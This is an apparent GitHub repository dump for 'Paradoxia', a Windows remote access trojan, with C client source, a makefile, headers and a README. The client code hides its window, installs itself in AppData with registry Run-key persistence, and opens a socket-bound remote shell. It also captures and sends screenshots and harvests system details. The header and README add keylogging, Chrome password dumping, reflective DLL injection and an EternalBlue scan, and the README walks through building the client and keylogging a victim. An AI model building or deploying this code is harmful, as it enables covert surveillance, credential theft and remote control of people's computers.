| // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | 34 | // we declare some common stuff in here... 
35 | 36 | #define DLL_QUERY_HMODULE 6 37 | 38 | #define DEREF( name )*(UINT_PTR *)(name) 39 | #define DEREF_64( name )*(DWORD64 *)(name) 40 | #define DEREF_32( name )*(DWORD *)(name) 41 | #define DEREF_16( name )*(WORD *)(name) 42 | #define DEREF_8( name )*(BYTE *)(name) 43 | 44 | typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID ); 45 | typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); 46 | 47 | #define DLLEXPORT __declspec( dllexport ) 48 | 49 | //===============================================================================================// 50 | #endif 51 | //===============================================================================================// 52 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/icon.rc: -------------------------------------------------------------------------------- 1 | id ICON "{{iconhere}}" -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/main.c: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Fahad (QuantumCore) 3 | main.c (c) 2020 4 | 5 | Created: 2020-08-15T15:27:04.427Z 6 | Modified: - 7 | */ 8 | /* 9 | Have a good time reading the source. You're an amazing person. 10 | If you decide to copy, Don't forget to give me credit. 
11 | */ 12 | #include "paradoxia.h" 13 | int main() // entry point 14 | { 15 | // O_o 16 | ShowWindow(GetConsoleWindow(), SW_HIDE); 17 | char installPath[BUFFER]; 18 | char installDir[BUFFER]; 19 | memset(installPath,'\0', BUFFER); 20 | snprintf(installPath, BUFFER, "%s\\%s\\%s", appDataPath(), INSTALL_FOLDER_NAME, INSTALL_NAME); 21 | memset(installDir,'\0', BUFFER); 22 | snprintf(installDir, BUFFER, "%s\\%s\\", appDataPath(), INSTALL_FOLDER_NAME); 23 | CreateDirectory (installDir, NULL); 24 | CopyFile(ParadoxiaInfo(), installPath, TRUE); 25 | StartupKey(installPath); 26 | MainConnect(); 27 | return 0; 28 | } 29 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/makefile: -------------------------------------------------------------------------------- 1 | COMPILER := 2 | ifeq ($(OS),Windows_NT) 3 | COMPILER += gcc 4 | else 5 | COMPILER += i686-w64-mingw32-gcc 6 | endif 7 | 8 | WINDRES := 9 | ifeq ($(OS),Windows_NT) 10 | WINDRES += windres 11 | else 12 | WINDRES += i686-w64-mingw32-windres 13 | endif 14 | 15 | 16 | OUTFILE := {{outfilehere}} 17 | 18 | main: 19 | $(COMPILER) main.c paradoxia.c ParadoxiaClient.c sys.c LoadLibraryR.c GetProcAddressR.c -o $(OUTFILE) -lws2_32 -static -liphlpapi -m32 -mwindows -lwinmm -lpsapi -lwininet -lshlwapi -MD -s -O3 20 | make icon: 21 | $(WINDRES) icon.rc -O coff -o icon.res -F pe-i386 22 | $(COMPILER) main.c paradoxia.c ParadoxiaClient.c sys.c LoadLibraryR.c GetProcAddressR.c -o $(OUTFILE) icon.res -lws2_32 -static -liphlpapi -m32 -mwindows -lwinmm -lpsapi -lwininet -lshlwapi -MD -s -O3 23 | clean: 24 | $(del) *.d 25 | $(del) *.exe 26 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/paradoxia.c: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Fahad (QuantumCore) 3 | paradoxia.c (c) 2020 4 | Created: 2020-08-15T15:27:04.427Z 5 | Modified: - 6 | */ 7 | 
8 | /* 9 | Have a good time reading the source. You're an amazing person. 10 | If you decide to copy, Don't forget to give me credit. 11 | */ 12 | 13 | 14 | #include "paradoxia.h" 15 | 16 | // Awesome! 17 | 18 | void TimeStamp(char buffer[100]) 19 | { 20 | time_t t = time(0); 21 | struct tm* now = localtime(&t); 22 | memset(buffer, '\0', 100); 23 | strftime(buffer, 100, "%Y-%m-%d-%S", now); 24 | } 25 | 26 | void ReportError(void) 27 | { 28 | printf("Error : %ld\n", GetLastError()); 29 | } 30 | 31 | void WSAReportError(void) 32 | { 33 | printf("Error : %ld\n", WSAGetLastError()); 34 | } 35 | 36 | 37 | void split(char* src, char* dest[5], const char* delimeter) { 38 | // Only split if delimeter does exist in the source string 39 | if (strstr(src, delimeter) != NULL) 40 | { 41 | int i = 0; 42 | char* p = strtok(src, delimeter); 43 | while (p != NULL) 44 | { 45 | dest[i++] = p; 46 | p = strtok(NULL, delimeter); 47 | } 48 | } 49 | } 50 | 51 | void ExecSock(SOCKET sockfd, char recvbuf[BUFFER]) 52 | { 53 | STARTUPINFO sinfo; 54 | PROCESS_INFORMATION pinfo; 55 | memset(&sinfo, 0, sizeof(sinfo)); 56 | sinfo.cb = sizeof(sinfo); 57 | sinfo.dwFlags = STARTF_USESTDHANDLES; 58 | sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)sockfd; 59 | if (CreateProcess(NULL, (LPSTR)recvbuf, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo)) { 60 | WaitForSingleObject(pinfo.hProcess, INFINITE); 61 | CloseHandle(pinfo.hProcess); 62 | CloseHandle(pinfo.hThread); 63 | } 64 | else { 65 | sockprintf("Failed to Create Process, Error : %ld\n", GetLastError()); 66 | } 67 | } 68 | DWORD ProcessId(LPCTSTR ProcessName) 69 | { 70 | PROCESSENTRY32 pt; 71 | HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 72 | pt.dwSize = sizeof(PROCESSENTRY32); 73 | if (Process32First(hsnap, &pt)) { 74 | do { 75 | if (!lstrcmpi(pt.szExeFile, ProcessName)) { 76 | CloseHandle(hsnap); 77 | return pt.th32ProcessID; 78 | } 79 | } while (Process32Next(hsnap, &pt)); 80 | } 81 | 
CloseHandle(hsnap); 82 | return 0; 83 | } 84 | 85 | int CaptureAnImage(HWND hWnd, SOCKET sockfd) 86 | { 87 | HDC hdcScreen; 88 | HDC hdcWindow; 89 | HDC hdcMemDC = NULL; 90 | HBITMAP hbmScreen = NULL; 91 | BITMAP bmpScreen; 92 | char buffer[100]; 93 | // Retrieve the handle to a display device context for the client 94 | // area of the window. 95 | hdcScreen = GetDC(NULL); 96 | hdcWindow = GetDC(hWnd); 97 | 98 | // Create a compatible DC which is used in a BitBlt from the window DC 99 | hdcMemDC = CreateCompatibleDC(hdcWindow); 100 | 101 | if (!hdcMemDC) 102 | { 103 | sockprintf( "CreateCompatibleDC has failed Error %i", GetLastError()); 104 | goto done; 105 | } 106 | 107 | // Get the client area for size calculation 108 | RECT rcClient; 109 | GetClientRect(hWnd, &rcClient); 110 | 111 | //This is the best stretch mode 112 | SetStretchBltMode(hdcWindow, HALFTONE); 113 | 114 | //The source DC is the entire screen and the destination DC is the current window (HWND) 115 | if (!StretchBlt(hdcWindow, 116 | 0, 0, 117 | rcClient.right, rcClient.bottom, 118 | hdcScreen, 119 | 0, 0, 120 | GetSystemMetrics(SM_CXSCREEN), 121 | GetSystemMetrics(SM_CYSCREEN), 122 | SRCCOPY)) 123 | { 124 | sockprintf( "StretchBlt has failed Error %i", GetLastError()); 125 | goto done; 126 | } 127 | 128 | // Create a compatible bitmap from the Window DC 129 | hbmScreen = CreateCompatibleBitmap(hdcWindow, rcClient.right - rcClient.left, rcClient.bottom - rcClient.top); 130 | 131 | if (!hbmScreen) 132 | { 133 | sockprintf( "CreateCompatibleBitmap Failed Error %i", GetLastError()); 134 | goto done; 135 | } 136 | 137 | // Select the compatible bitmap into the compatible memory DC. 138 | SelectObject(hdcMemDC, hbmScreen); 139 | 140 | // Bit block transfer into our compatible memory DC. 
141 | if (!BitBlt(hdcMemDC, 142 | 0, 0, 143 | rcClient.right - rcClient.left, rcClient.bottom - rcClient.top, 144 | hdcWindow, 145 | 0, 0, 146 | SRCCOPY)) 147 | { 148 | sockprintf( "BitBlt has failed Error %i", GetLastError()); 149 | goto done; 150 | } 151 | 152 | // Get the BITMAP from the HBITMAP 153 | GetObject(hbmScreen, sizeof(BITMAP), &bmpScreen); 154 | 155 | BITMAPFILEHEADER bmfHeader; 156 | BITMAPINFOHEADER bi; 157 | 158 | bi.biSize = sizeof(BITMAPINFOHEADER); 159 | bi.biWidth = bmpScreen.bmWidth; 160 | bi.biHeight = bmpScreen.bmHeight; 161 | bi.biPlanes = 1; 162 | bi.biBitCount = 32; 163 | bi.biCompression = BI_RGB; 164 | bi.biSizeImage = 0; 165 | bi.biXPelsPerMeter = 0; 166 | bi.biYPelsPerMeter = 0; 167 | bi.biClrUsed = 0; 168 | bi.biClrImportant = 0; 169 | 170 | DWORD dwBmpSize = ((bmpScreen.bmWidth * bi.biBitCount + 31) / 32) * 4 * bmpScreen.bmHeight; 171 | 172 | // Starting with 32-bit Windows, GlobalAlloc and LocalAlloc are implemented as wrapper functions that 173 | // call HeapAlloc using a handle to the process's default heap. Therefore, GlobalAlloc and LocalAlloc 174 | // have greater overhead than HeapAlloc. 175 | HANDLE hDIB = GlobalAlloc(GHND, dwBmpSize); 176 | char* lpbitmap = (char*)GlobalLock(hDIB); 177 | 178 | // Gets the "bits" from the bitmap and copies them into a buffer 179 | // which is pointed to by lpbitmap. 180 | GetDIBits(hdcWindow, hbmScreen, 0, 181 | (UINT)bmpScreen.bmHeight, 182 | lpbitmap, 183 | (BITMAPINFO*)&bi, DIB_RGB_COLORS); 184 | 185 | // A file is created, this is where we will save the screen capture. 186 | /* HANDLE hFile = CreateFile(L"captureqwsx.bmp", 187 | GENERIC_WRITE, 188 | 0, 189 | NULL, 190 | CREATE_ALWAYS, 191 | FILE_ATTRIBUTE_NORMAL, NULL); 192 | */ 193 | // Add the size of the headers to the size of the bitmap to get the total file size 194 | DWORD dwSizeofDIB = dwBmpSize + sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER); 195 | 196 | //Offset to where the actual bitmap bits start. 
197 | bmfHeader.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER); 198 | 199 | //Size of the file 200 | bmfHeader.bfSize = dwSizeofDIB; 201 | 202 | //bfType must always be BM for Bitmaps 203 | bmfHeader.bfType = 0x4D42; //BM 204 | 205 | TimeStamp(buffer); 206 | sockprintf( "SCREENSHOT:%s.bmp:%i", buffer, sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwBmpSize); 207 | Sleep(1000); 208 | DWORD dwBytesWritten = 0; 209 | WriteFile((HANDLE)sockfd, (LPSTR)&bmfHeader, sizeof(BITMAPFILEHEADER), &dwBytesWritten, NULL); 210 | WriteFile((HANDLE)sockfd, (LPSTR)&bi, sizeof(BITMAPINFOHEADER), &dwBytesWritten, NULL); 211 | WriteFile((HANDLE)sockfd, (LPSTR)lpbitmap, dwBmpSize, &dwBytesWritten, NULL); 212 | 213 | //Unlock and Free the DIB from the heap 214 | GlobalUnlock(hDIB); 215 | GlobalFree(hDIB); 216 | 217 | //Close the handle for the file that was created 218 | // CloseHandle(hFile); 219 | 220 | //Clean up 221 | done: 222 | if (hbmScreen) { 223 | DeleteObject(hbmScreen); 224 | } 225 | 226 | if (hdcMemDC) { 227 | DeleteObject(hdcMemDC); 228 | } 229 | 230 | ReleaseDC(NULL, hdcScreen); 231 | ReleaseDC(hWnd, hdcWindow); 232 | 233 | return 0; 234 | } 235 | 236 | char* appDataPath() 237 | { 238 | static char szPath[MAX_PATH]; 239 | if (SUCCEEDED(SHGetFolderPath(NULL, CSIDL_APPDATA | CSIDL_FLAG_CREATE, NULL, 0, szPath))){ 240 | return szPath; 241 | } else { 242 | return "C:\\Users\\Public"; // If We are unable to get the AppData/Romaing path, Use Public $HOME folder for installation 243 | } 244 | } 245 | 246 | 247 | 248 | void StartupKey(const char* czExePath) 249 | { 250 | HKEY hKey; 251 | LONG lnRes = RegOpenKeyEx( HKEY_CURRENT_USER, 252 | "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 253 | 0 , KEY_WRITE, 254 | &hKey); 255 | if( ERROR_SUCCESS == lnRes ) 256 | { 257 | lnRes = RegSetValueEx( hKey, 258 | INSTALL_FOLDER_NAME, 259 | 0, 260 | REG_SZ, 261 | czExePath, 262 | strlen(czExePath)); 263 | } 264 | 265 | RegCloseKey(hKey); 266 | } 267 | 
-------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/paradoxia.h: -------------------------------------------------------------------------------- 1 | #ifndef __PARADOXIA__H__ 2 | #define __PARADOXIA__H__ 3 | /* 4 | Author: Fahad (QuantumCore) 5 | paradoxia.h (c) 2020 6 | Desc: Main header file 7 | Created: 2020-08-15T15:27:04.427Z 8 | Modified: - 9 | */ 10 | 11 | 12 | // This is the maalik client modified to work as a RAT client for paradoxia. 13 | // Changes : 14 | // Some new commands added. 15 | // Built in Keylogger. 16 | // Built in Chrome Dump. 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | 29 | #define INSTALL_NAME "{{installname}}" 30 | #define INSTALL_FOLDER_NAME "{{installdir}}" 31 | 32 | 33 | #pragma comment(lib, "ws2_32.lib") 34 | #pragma comment(lib, "iphlpapi.lib") 35 | #pragma comment(lib, "advapi32.lib") 36 | #pragma comment(lib, "wininet.lib") 37 | #pragma comment(lib, "shlwapi.lib") 38 | #pragma comment(lib, "winmm.lib") 39 | 40 | #define BUFFER 1024 41 | static BOOL connected = FALSE; 42 | 43 | 44 | //===================== 45 | void ReportError(void); 46 | void WSAReportError(void); 47 | char* appDataPath(); 48 | int CaptureAnImage(HWND hWnd, SOCKET sockfd); 49 | void TimeStamp(char buffer[100]); 50 | BOOL IsAdmin(); 51 | void OS(); 52 | void ramsize(int mode); 53 | void SYSTEMINFO(int mode); 54 | //===================== 55 | void sockprintf(const char* words, ...); 56 | char* ParadoxiaInfo(); 57 | BOOL isFile(const char* file); 58 | void UserPC(); 59 | void EternalBlueScan(const char* host); 60 | char* cDir(); 61 | // Start Winsock 62 | void StartWSA(void); 63 | void StartupKey(const char* czExePath); 64 | void paradoxia_main(void); 65 | void MainConnect(void); 66 | void sockSend(const char* data); 67 | DWORD ProcessId(LPCTSTR ProcessName); 68 | void ExecSock(SOCKET sockfd, char 
recvbuf[BUFFER]); 69 | static int process_row(void* passed_db, int argc, char** argv, char** col_name); 70 | static int fill_secret_file(char* url, char* username, unsigned char* password); 71 | void split(char* src, char* dest[5], const char* delimeter); 72 | void REConnect(); 73 | 74 | #endif //!__paradoxia__H__ -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/sys.c: -------------------------------------------------------------------------------- 1 | 2 | /* 3 | Author: Fahad (QuantumCore) 4 | sys.c (c) 2020 5 | Created: 2020-08-15T15:27:04.427Z 6 | Modified: - 7 | */ 8 | 9 | /* 10 | Have a good time reading the source. You're an amazing person. 11 | If you decide to copy, Don't forget to give me credit. 12 | */ 13 | 14 | #include "paradoxia.h" 15 | // This may be useful somewhere 16 | BOOL isFile(const char* file) 17 | { 18 | DWORD dwAttrib = GetFileAttributes(file); 19 | 20 | return (dwAttrib != INVALID_FILE_ATTRIBUTES && 21 | !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); 22 | } 23 | 24 | // TODO : Add Error handlng 25 | void UserPC() 26 | { 27 | char username[UNLEN + 1]; 28 | char hostname[MAX_COMPUTERNAME_LENGTH + 1]; 29 | DWORD len = UNLEN + 1; 30 | DWORD hlen = sizeof(hostname) / sizeof(hostname[0]); 31 | GetUserNameA(username, &len); 32 | GetComputerNameA(hostname, &hlen); 33 | sockprintf( "%s / %s", username, hostname); 34 | 35 | } 36 | 37 | 38 | 39 | 40 | char* cDir() 41 | { 42 | static char DIR[MAX_PATH]; 43 | memset(DIR, '\0', MAX_PATH); 44 | GetCurrentDirectory(MAX_PATH, DIR); 45 | return (char*)DIR; 46 | } 47 | 48 | BOOL IsAdmin() { 49 | BOOL fIsRunAsAdmin = FALSE; 50 | DWORD dwError = ERROR_SUCCESS; 51 | PSID pAdministratorsGroup = NULL; 52 | 53 | SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; 54 | if (!AllocateAndInitializeSid(&NtAuthority, 2, 55 | SECURITY_BUILTIN_DOMAIN_RID, 56 | DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pAdministratorsGroup)) { 57 | dwError = 
GetLastError(); 58 | 59 | } 60 | else if (!CheckTokenMembership(NULL, pAdministratorsGroup, 61 | &fIsRunAsAdmin)) { 62 | dwError = GetLastError(); 63 | 64 | } 65 | 66 | if (pAdministratorsGroup) { 67 | FreeSid(pAdministratorsGroup); 68 | pAdministratorsGroup = NULL; 69 | } 70 | 71 | return fIsRunAsAdmin; 72 | } 73 | 74 | 75 | char* ParadoxiaInfo() 76 | { 77 | static char DIR[MAX_PATH]; 78 | GetModuleFileName(NULL, DIR, MAX_PATH); 79 | return PathFindFileName(DIR); 80 | } 81 | 82 | void OS() 83 | { 84 | int ret = 0.0; 85 | NTSTATUS(WINAPI * RtlGetVersion)(LPOSVERSIONINFOEXW); 86 | OSVERSIONINFOEXW osInfo; 87 | RtlGetVersion = GetProcAddress(GetModuleHandleA("ntdll"), "RtlGetVersion"); 88 | 89 | if (NULL != RtlGetVersion) 90 | { 91 | osInfo.dwOSVersionInfoSize = sizeof osInfo; 92 | RtlGetVersion(&osInfo); 93 | ret = osInfo.dwMajorVersion; 94 | } 95 | int mw = osInfo.dwMinorVersion; 96 | if (ret == 5) { 97 | switch (mw) 98 | { 99 | case 0: 100 | // 5.0 = Windows 2000 101 | sockprintf( "Windows 2000"); 102 | break; 103 | case 1: 104 | // 5.1 = Windows XP 105 | sockprintf( "Windows 2000"); 106 | break; 107 | 108 | case 2: 109 | sockprintf( "Windows XP Professional"); 110 | break; 111 | 112 | default: 113 | sockprintf( "Windows %i", mw); 114 | break; 115 | } 116 | } 117 | else if (ret == 6) { 118 | switch (mw) 119 | { 120 | case 0: 121 | sockprintf( "Windows Vista"); 122 | break; 123 | case 1: 124 | sockprintf( "Windows 7"); 125 | break; 126 | case 2: 127 | sockprintf( "Windows 8"); 128 | break; 129 | case 3: 130 | sockprintf( "Windows 8.1"); 131 | break; 132 | 133 | default: 134 | sockprintf( "Windows %i", mw); 135 | break; 136 | } 137 | } 138 | else if (ret == 10) { 139 | sockprintf( "Windows 10"); 140 | } 141 | else { 142 | 143 | sockprintf( "Windows %i", mw); 144 | } 145 | } 146 | 147 | 148 | void SYSTEMINFO(int mode) { 149 | SYSTEM_INFO info; 150 | GetSystemInfo(&info); 151 | switch (mode) 152 | { 153 | case 0: 154 | sockprintf( "%i", info.dwNumberOfProcessors); 155 
| break; 156 | 157 | case 1: 158 | sockprintf( "%i", info.dwPageSize); 159 | break; 160 | 161 | case 2: 162 | sockprintf( "%i", info.lpMinimumApplicationAddress); 163 | break; 164 | 165 | case 3: 166 | sockprintf( "%i", info.lpMaximumApplicationAddress); 167 | break; 168 | 169 | default: 170 | break; 171 | } 172 | } 173 | 174 | 175 | void ramsize(int mode) 176 | { 177 | MEMORYSTATUSEX memstatx; 178 | memstatx.dwLength = sizeof(memstatx); 179 | GlobalMemoryStatusEx(&memstatx); 180 | float ramsize = memstatx.ullTotalPhys / (1024 * 1024); 181 | float memVrsize = memstatx.ullTotalVirtual / (1024 * 1024); 182 | 183 | if (mode == 1) { 184 | sockprintf( "%f", ramsize); 185 | } 186 | else { 187 | sockprintf( "%f", memVrsize); 188 | } 189 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Paradoxia Remote Access Tool. 5 | 6 | **Are you looking for a GUI alternative? Check out [Remote Hacker Probe](https://github.com/quantumcored/remote_hacker_probe). More Advanced and Stable with ton of features.** 7 | 8 | ### Features 9 | 10 | ##### Paradoxia Console 11 | Feature | Description 12 | --------|------------- 13 | Easy to use | Paradoxia is extremely easy to use, So far the easiest rat! 14 | Root Shell | - 15 | Automatic Client build | Build Paradoxia Client easily with or without the icon of your choice. 16 | Multithreaded | Multithreaded Console server, You can get multiple sessions. 17 | Toast Notifications | Desktop notification on new session 18 | Configurable Settings | Configurable values in ``paradoxia.ini`` 19 | Kill Sessions | Kill Sessions without getting in session. 20 | View Session information | View Session information without getting in Session. 21 | 22 | --- 23 | 24 | ##### Paradoxia Client 25 | Feature | Description 26 | --------|------------- 27 | Stealth | Runs in background. 
28 | Full File Access | Full access to the entire file system. 29 | Persistence | Installs inside APPDATA and has startup persistence via a Registry key. 30 | Upload / Download Files | Upload and download files. 31 | Screenshot | Take a screenshot. 32 | Mic Recording | Record the microphone. 33 | Chrome Password Recovery | Dump Chrome passwords using a Reflective DLL (does not work on the latest version) :shipit: 34 | Keylogger | Log keystrokes and save them to a file via a Reflective DLL. 35 | Geolocate | Geolocate the Paradoxia Client. 36 | Process Info | Get process information. 37 | DLL Injection | Reflective DLL Injection over a socket. Load your own Reflective DLL, or use the ones available [here](https://github.com/quantumcored/maalik/tree/master/payloads). 38 | Power off | Power off the client system. 39 | Reboot | Reboot the client system. 40 | MSVC + MINGW Support | A Visual Studio project is also included. 41 | Reverse Shell | Stable reverse shell. 42 | Small Client | Maximum size is 30kb without an icon. 43 | 44 | --- 45 | 46 | 47 | ### Installation (via APT) 48 | ```bash 49 | $ git clone https://github.com/quantumcored/paradoxiaRAT 50 | $ cd paradoxiaRAT 51 | $ chmod +x install.sh 52 | $ sudo ./install.sh 53 | ``` 54 | 55 | ### Example Usage : 56 | - Run Paradoxia 57 | ``` 58 | sudo python3 paradoxia.py 59 | ``` 60 | - Once in the Paradoxia console, the first step is to build the client, preferably with an icon. 61 | 62 | ![pd1](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd1.PNG) 63 | 64 | - Once it is built, as you can see below, Windows Defender detects it as severe malware, which is expected since it IS malware. 65 | 66 | ![pd2](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd2.PNG) 67 | 68 | - I'm going to transfer the client to a Windows 10 virtual machine and execute it. After executing it, it appears under Startup programs in Task Manager. 
69 | 70 | ![pd3](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd3.PNG) 71 | 72 | - It has also copied itself into the AppData directory and is installed under the name we specified during the build. 73 | 74 | ![pdmiss](https://github.com/quantumcored/paradoxiaRAT/blob/master/images/pdmiss.PNG) 75 | 76 | - At the same time, I get a session on the server side. 77 | 78 | ![pd4](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd4.PNG) 79 | 80 | - The first thing I'd do is get into the session and view its information. 81 | 82 | ![pd5](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd5.PNG) 83 | 84 | - There are plenty of things we can do right now, but as an example I will demonstrate keylogging. 85 | 86 | ![pd6](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd7.PNG) 87 | 88 | You can see in the image above that it says it successfully injected the DLL, and in the file listing there is a file named ``log.log``, which contains the logged keystrokes. 89 | 90 | - Let's view the captured keystrokes. 91 | 92 | ![pd7](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd8.PNG) 93 | 94 | 95 | ### Changelog 96 | - This repository was previously home to 3 tools: [Iris](https://github.com/quantumcored/iris), [Thawne](https://github.com/quantumcored/thawne) and the previous version of Paradoxia. They can be found [here](https://github.com/quantumcored/paradoxiaRAT/tree/930a396cb64744de0d8cd14e55540a97ba9fa452). 97 | - Everything has been changed entirely: the client has been rewritten, Infodb has been removed, many new features have been added, and stability has been improved. 98 | 99 | #### Links 100 | - [Setting up Paradoxia on Kali Linux](https://youtu.be/F4TAdWDlR-w) (old version, but works) 101 | 102 | #### Developer 103 | Hi, my name's [Fahad](https://github.com/quantumcore). 
104 | You may contact me on [Discord](https://discordapp.com/invite/8snh7nx) or via [My Website](https://quantumcored.com/) 105 | 106 | #### LICENSE 107 | [VIEW LICENSE](https://github.com/quantumcored/paradoxia/blob/master/LICENSE) 108 | 109 | The developer is not responsible for any misuse of, or damage caused by, the program. This was created only to innovate InfoSec and **YOU**. :point_left: 110 | 111 | #### Donate 112 | Help me with my future projects. Thank you. 113 | [Donate with Crypto](https://commerce.coinbase.com/checkout/cebcb394-f73e-4990-98b9-b3fdd852358f) 114 | -------------------------------------------------------------------------------- /blacklist: -------------------------------------------------------------------------------- 1 | # Add blacklisted IPs here. 2 | -------------------------------------------------------------------------------- /dlls/chrome.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/dlls/chrome.dll -------------------------------------------------------------------------------- /dlls/keylogger.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/dlls/keylogger.dll -------------------------------------------------------------------------------- /dlls/readme.md: -------------------------------------------------------------------------------- 1 | ### DLLs 2 | This folder contains the compiled DLLs of ChromeDump and Keylogger. 
3 | Source code of these DLLS is available [here](https://github.com/quantumcored/maalik/tree/master/payloads) -------------------------------------------------------------------------------- /images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/logo.png -------------------------------------------------------------------------------- /images/pd1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd1.PNG -------------------------------------------------------------------------------- /images/pd2.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd2.PNG -------------------------------------------------------------------------------- /images/pd3.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd3.PNG -------------------------------------------------------------------------------- /images/pd4.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd4.PNG -------------------------------------------------------------------------------- /images/pd5.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd5.PNG -------------------------------------------------------------------------------- /images/pd6.PNG: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd6.PNG -------------------------------------------------------------------------------- /images/pd7.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd7.PNG -------------------------------------------------------------------------------- /images/pd8.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd8.PNG -------------------------------------------------------------------------------- /images/pdmiss.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pdmiss.PNG -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | clear 2 | if [[ $EUID -ne 0 ]]; then 3 | echo "[^] Run as root." 4 | exit 1 5 | fi 6 | echo "PARADOXIA Installer" 7 | apt-get install mingw-w64 8 | apt-get install python3-pip 9 | pip3 install -r requirements.txt 10 | sleep 1 11 | clear 12 | echo "Done, Now you may run Paradoxia." 13 | -------------------------------------------------------------------------------- /kernel/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | 3 | Gangsters don't cry, Therefore, Therefore I'm. 4 | Mr Misty Eyes, Therefore, I'm. 
5 | 6 | """ -------------------------------------------------------------------------------- /kernel/banner.py: -------------------------------------------------------------------------------- 1 | """ 2 | 3 | Have a good time reading the source. You are an amazing person. 4 | 5 | """ 6 | 7 | from colorama import Fore, Style 8 | import colorama, random 9 | 10 | colorama.init() 11 | 12 | banner = Style.BRIGHT + Fore.CYAN + r""" 13 | ___ ____ ____ ____ ___ ____ _ _ _ ____ 14 | |__] |__| |__/ |__| | \ | | \/ | |__| 15 | | | | | \ | | |__/ |__| _/\_ | | | 16 | 17 | ----------------------------- ------------------------------- 18 | Control is an Illusion 19 | """ + Style.RESET_ALL 20 | 21 | bannertwo = Style.BRIGHT + Fore.YELLOW + r""" 22 | ______________ 23 | ,===:'., `-._ 24 | `:.`---.__ `-._ 25 | Never tell everything `:. `--. `. 26 | you know... \. `. `. 27 | (,,(, \. `. ____,-`., 28 | (,' `/ \. ,--.___`.' 29 | , ,' ,--. `, \.;' ` 30 | `{D, { \ : \; 31 | V,,' / / // 32 | j;; / ,' ,-//. ,---. , 33 | \;' / ,' / _ \ / _ \ ,'/ 34 | \ `' / \ `' / \ `.' 
